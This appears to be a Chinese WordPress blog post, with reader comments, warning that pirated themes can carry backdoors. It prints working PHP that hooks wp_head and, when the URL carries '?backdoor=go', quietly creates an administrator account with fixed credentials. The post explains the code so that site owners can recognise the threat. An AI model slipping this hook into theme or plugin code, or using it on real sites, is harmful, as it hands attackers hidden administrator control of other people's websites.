小心!盗版主题中可能存在后门

WordPress除了大量官方的主题,还有为数众多的主题设计者发布免费和收费主题,很多童鞋经常到处收集主题拿回来测试使用,其中一些无良者将收集到的国外商业收费主题进行汉化修改,添加暗链、广告,甚至恶意代码,然后免费或者收费公开发布出去,诱使别人下载使用,达到不可告人的目的。另外,这些商业收费主题一般都是测试版本,主题代码不完善、功能缺失,个别测试版的商业主题启用后会自动向数据库中写入大量数据.......

小心!盗版主题中可能存在后门

下面的代码更加邪恶,可以自动添加一个角色为管理员的用户。

  1. add_action('wp_head', 'holeinthewall');
  2. function holeinthewall() {
  3.         If ($_GET['backdoor'] == 'go') {
  4.                 require('wp-includes/registration.php');
  5.                 If (!username_exists('username')) {
  6.                         $user_id = wp_create_user('username', 'password');
  7.                         $user = new WP_User($user_id);
  8.                         $user->set_role('administrator');
  9.                 }
  10.         }
  11. }

将代码添加到您当前主题的 functions.php 文件或插件中,会自动创建一个用户名:username 密码:password的有管理员权限的用户,之后想做什么都可以了。

所以,这里奉劝大家还是不要在自己的站点上使用盗版主题和插件,尽量到官方或原始发布站点下载主题,以免被开了后门也不知晓!

源代码出处:https://trickspanda.com/create-backdoor-wordpress/

weinxin
我的微信
分享交流WordPress经验与技巧,关注前端设计与网站制作。仅用于功能演示。
Begin主题购买
Begin主题购买

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

目前评论:6   其中:访客  5   博主  1

    • avatar 狂人日记 来自天朝的朋友 谷歌浏览器 Windows 8.1 江苏省扬州市 电信 2

      就爱用知更鸟主题,懒得瞎折腾。
      不过这篇文章里的思路肯定会被心怀剖测的人利用啊。

        • avatar 知更鸟 Admin 来自天朝的朋友 火狐浏览器 Windows XP 辽宁省沈阳市 联通

          @狂人日记 这代码既然我知道别人也会知道,还是公布出来,让大家防患于未然

        • avatar 眼幕微启 来自天朝的朋友 谷歌浏览器 Windows 7 重庆市 电信 5

          一直用鸟哥的主题,还没换过其他的,^_^

          • avatar 阿零 来自天朝的朋友 谷歌浏览器 Windows XP 云南省曲靖市 电信 2

            就用鸟哥的主题啦,打死也不换。

            • avatar 正仔 来自天朝的朋友 谷歌浏览器 Windows 7 广东省广州市 电信 1

              我用自己写的主题 O(∩_∩)O~~

              • avatar 来自天朝的朋友 火狐浏览器 Windows 7 广东省深圳市 鹏博士长城宽带 0

                鸟叔你好!我想问下,如果这样被添加了一个管理员用户,那在后台用户那里应该可以看到吧!这样管理员肯定会觉察的,呵呵, 我没有试过,不知道在后台能不能看到。谢谢鸟叔,涨知识了!